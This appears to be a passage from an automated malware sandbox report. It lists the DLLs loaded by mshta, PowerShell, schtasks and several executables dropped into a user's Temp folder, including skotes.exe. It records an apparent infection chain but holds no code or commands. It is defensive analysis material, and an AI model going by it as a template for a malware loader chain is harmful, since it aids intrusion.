Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: ucrtbase_clr0400.dll
